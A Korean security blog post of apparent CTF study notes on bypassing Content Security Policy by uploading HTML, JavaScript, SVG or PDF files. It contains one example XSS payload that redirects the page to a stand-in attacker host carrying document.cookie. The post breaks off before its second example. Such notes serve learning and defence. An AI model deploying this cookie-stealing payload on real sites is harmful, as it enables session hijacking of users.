• OS
  • 물리서버
  • 보안
  • 네트워크
  • 클라우드
  • 자격증
카테고리

6. XSS - mitigations

2025. 1. 20. 02:19·Security/CTF
반응형

업로드 기반 CSP 우회 시도 기법

업로드 가능한 파일 종류

  • HTML 파일: xss.html 파일을 업로드하여 HTML 코드 실행 시도.
  • JavaScript 파일: xss.js 파일 업로드 후 <script src="uploads/xss.js">로 호출.
  • 이미지 파일 (GIF, SVG): 일부 이미지 포맷에 스크립트를 숨겨 실행.
  • PDF, ZIP 파일: PDF 내 스크립트 삽입, 압축파일 내 악성 HTML/JS 포함.

XSS 시도 예시

  • 공격자가 다음과 같은 xss.js를 업로드:
 location.href = "<https://attacker-site.com/steal?cookie=>" + encodeURIComponent(document.cookie);
  • 이후 업로드된 파일을 호출:
반응형

'Security > CTF' 카테고리의 다른 글

8.1 SSTI - server flag  (0) 2025.01.22
3.3 SQLi_WAF_3  (0) 2025.01.22
3.1 SQLi_WAF_1  (0) 2025.01.22
Web_main 기초 과정 정리  (0) 2025.01.20
3.2 SQLi_WAF_2  (0) 2025.01.20
'Security/CTF' 카테고리의 다른 글
  • 3.3 SQLi_WAF_3
  • 3.1 SQLi_WAF_1
  • Web_main 기초 과정 정리
  • 3.2 SQLi_WAF_2
wogho
wogho
    반응형
  • wogho
    눙이의 인프라 메모장
    wogho
  • 전체
    오늘
    어제
    • 분류 전체보기
      • OS
        • Linux
        • Windows Server
      • Physical Server
        • Xenserver
        • Equipment
      • Network
        • Cisco
      • Cloud
        • GCP
        • AZURE
        • AWS
      • Security
        • Basic
        • CTF
        • Solution
      • Language
      • Certificate
  • 블로그 메뉴

    • OS
    • 물리서버
    • 보안
    • 네트워크
    • 클라우드
    • 자격증
  • 링크

  • 공지사항

    • Tistory 추천 스킨 및 폰트 (hELLO & d2co⋯
  • 인기 글

  • 태그

    CentOS
    ubuntu
    윈도우서버
    windows
    lsi
    리눅스
    PowerShell
    megacli
    윈도우
    MEGARAID
    데비안
    mdadm
    네트워크
    서버
    SMB
    Linux
    Windows Server
    debian
    RAID
  • 최근 댓글

  • 최근 글

  • hELLO· Designed By정상우.v4.10.6
wogho
6. XSS - mitigations
상단으로

티스토리툴바